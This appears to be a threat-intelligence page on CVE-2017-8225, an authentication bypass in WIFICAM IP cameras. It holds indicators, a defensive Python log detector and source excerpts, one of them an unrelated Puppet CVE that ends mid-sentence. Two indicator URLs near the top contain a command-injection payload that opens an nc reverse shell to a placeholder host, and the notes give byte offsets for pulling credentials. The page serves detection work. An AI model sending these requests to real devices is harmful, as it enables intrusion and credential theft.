CVE-2017-8225
Published 2017-04-25
Priority: P188 · critical · 9.8 (CVSS 3.0)
CVSS 3.0 vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 17.87% (96.8th percentile)
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
Detection & IOCs (extracted from sources)
- URL: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20192.168.1.1+1337%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
- URL: /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+192.168.1.1+1337+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0
- Authentication bypass via empty loginuse and loginpas parameters in the URI: detect HTTP requests to camera CGI endpoints where both loginuse= and loginpas= are empty strings.
- Monitor HTTP GET requests to /set_ftp.cgi and /ftptest.cgi on GoAhead WIFICAM devices for command-injection patterns in the pwd= parameter (e.g., subshell syntax such as $(...) or backticks).
- Detect unauthenticated access to .ini files (e.g., System.ini) on GoAhead WIFICAM devices; these contain plaintext credentials and should never be publicly accessible.
- Check Point IPS protection name for this CVE: 'Wireless IP Camera (P2P) WIFICAM Cameras Information Disclosure'; use as a signature reference for network IDS/IPS tuning.
- Check Point IPS protection name for the associated RCE: 'Wireless IP Camera (P2P) WIFICAM Cameras Remote Code Execution'; use as a signature reference for network IDS/IPS tuning.
- Binary pattern in credential extraction: look for the byte sequence 0x0a 0x0a 0x0a 0x0a 0x01 in HTTP responses from camera devices; credentials are located at fixed offsets (+138 bytes for username, +170 bytes for password) after this marker.
- The exploit hardcodes CAM_PORT 80 as the default attack port, but infected GoAhead devices observed in the wild were running on TCP port 81; scanning and detection should cover both ports.
- The REMOTE_HOST and REMOTE_PORT values in the exploit (192.168.1.1 / 1337) are placeholder defaults; real-world attacks use attacker-controlled IPs and arbitrary ports for the reverse-shell callback.
- The vulnerability affects GoAhead-based Wireless IP Camera (P2P) WIFICAM devices; the same IoTroop/IoTReaper botnet campaign also exploited vulnerabilities in D-Link, TP-Link, AVTECH, NETGEAR, MikroTik, Linksys, and Synology devices, so detections should not be scoped to GoAhead alone.
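A small log detector for the three request patterns listed above (empty loginuse/loginpas, .ini file access, subshell syntax in pwd= on the FTP CGI endpoints), added here as an example; it is not code from any of the cited sources, the log lines are constructed, and the alert labels are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2017:10:00:01 +0000] "GET /System.ini?loginuse=&loginpas= HTTP/1.1" 200 1200
10.0.0.5 - - [25/Apr/2017:10:00:02 +0000] "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=&loginpas=&svr=10.0.0.5&port=21&user=ftp&pwd=$(id)&dir=/&mode=PORT&upload_interval=0 HTTP/1.1" 200 85
10.0.0.7 - - [25/Apr/2017:10:01:10 +0000] "GET /login.cgi?loginuse=admin&loginpas=secret HTTP/1.1" 200 410
10.0.0.9 - - [25/Apr/2017:10:02:00 +0000] "GET /ftptest.cgi?loginuse=admin&loginpas=secret&pwd=%60id%60 HTTP/1.1" 200 85
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
FTP_CGI_ENDPOINTS = {"/set_ftp.cgi", "/ftptest.cgi"}  # endpoints named in the notes
SUBSHELL_RE = re.compile(r"\$\(|`")                   # $(...) or backtick syntax


def analyze_request(target):
    """Return the list of detection labels that apply to one request target."""
    parts = urlsplit(target)
    # keep_blank_values=True is essential: the bypass is signalled by EMPTY values,
    # which parse_qs silently drops by default.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # 1. CVE-2017-8225 bypass: both credential parameters present and empty.
    if "loginuse" in params and "loginpas" in params and all(
        v == "" for v in params["loginuse"] + params["loginpas"]
    ):
        findings.append("empty-credential-bypass")
    # 2. Direct fetch of a .ini configuration file (e.g. System.ini).
    if parts.path.lower().endswith(".ini"):
        findings.append("ini-file-access")
    # 3. Subshell syntax inside pwd= on the FTP configuration CGIs
    #    (percent-encoding is undone by parse_qs before matching).
    if parts.path in FTP_CGI_ENDPOINTS and any(
        SUBSHELL_RE.search(p) for p in params.get("pwd", [])
    ):
        findings.append("pwd-command-injection")
    return findings


def scan_log(text):
    """Yield (client_ip, path, findings) for every log line that triggers a rule."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = analyze_request(m.group("target"))
        if findings:
            alerts.append((line.split()[0], urlsplit(m.group("target")).path, findings))
    return alerts
```

Feed it a real GoAhead camera access log (or proxy log, covering both TCP 80 and 81 as the notes suggest) in place of SAMPLE_LOG.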
CVSS provenance
- NVD v3.0: 9.8 CRITICAL (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-5rv8-75v4-fcqc · ghsa_unreviewed · 2022-05-13 · CVE-2017-8225 [CRITICAL] · CWE-522
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
VulnCheck
CVE-2017-8225 [CRITICAL] · vulncheck · 2017 · CVSS 9.8
wificam wireless_ip_camera_(p2p)_firmware: Insufficiently Protected Credentials
On Wireless IP Camera (P2P) WIFICAM devices, access to .ini files (containing credentials) is not correctly checked. An attacker can bypass authentication by providing an empty loginuse parameter and an empty loginpas parameter in the URI.
Affected: wificam wireless_ip_camera_(p2p)_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2017/new-iot-botnet-storm-coming/; https://www.radware.com/blog/security/iot_reaper-botnet/; https://blog.netlab.360.com/ddos-botnet-moobot-en/; https://www.researchgate.net/publication/348602660_An_analysis_
No detection rules found.
Check Point
A New IoT Botnet Storm is Coming · blogs_checkpoint · 2017-10-19
## A New IoT Botnet Storm is Coming
Key Points:
- A massive botnet is forming to create a cyber-storm that could take down the internet.
- An estimated million organizations have already been s
arXiv
HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version) · arxiv_fulltext · 2019-05-03
Authors: Dominik Breitenbacher, Ivan Homoliak, Yan Lin Aung and Yuval Elovici (Singapore University of Technology and Design); Nils Ole Tippenhauer (CISPA Helmholtz Center for Information Security, ORCID 0000-0001-8424-2602)
## Abstract
Internet of Things (IoT) devices have become ubiquitous and are spread across many application domains including the industry, transportation
Bugzilla
CVE-2017-10690 [MEDIUM] puppet: Environment leakage in puppet-agent · bugzilla · 2018-04-13 · CVSS 6.5
puppet-agent before version 5.3.4 has an information disclosure vulnerability that allows an agent to retrieve facts from an environment that it was not classified to retrieve from.
External References: https://puppet.com/security/cve/CVE-2017-10690
Upstream Issue: https://tickets.puppetlabs.com/browse/PUP-8225
Upstream Patch: https://github.com/puppetlabs/puppet/commit/bd87bef2c3862d333f4c1f2b148b147d449a375b
Statement: This issue affects the versions of puppet-agent as shipped with Red Hat Enterprise Satellite 6.3 and later. Red Hat Product Security has rated this issue as having security impact of Moderate. A future update may address this issue. For additional information, refer to the Issue Severity Cl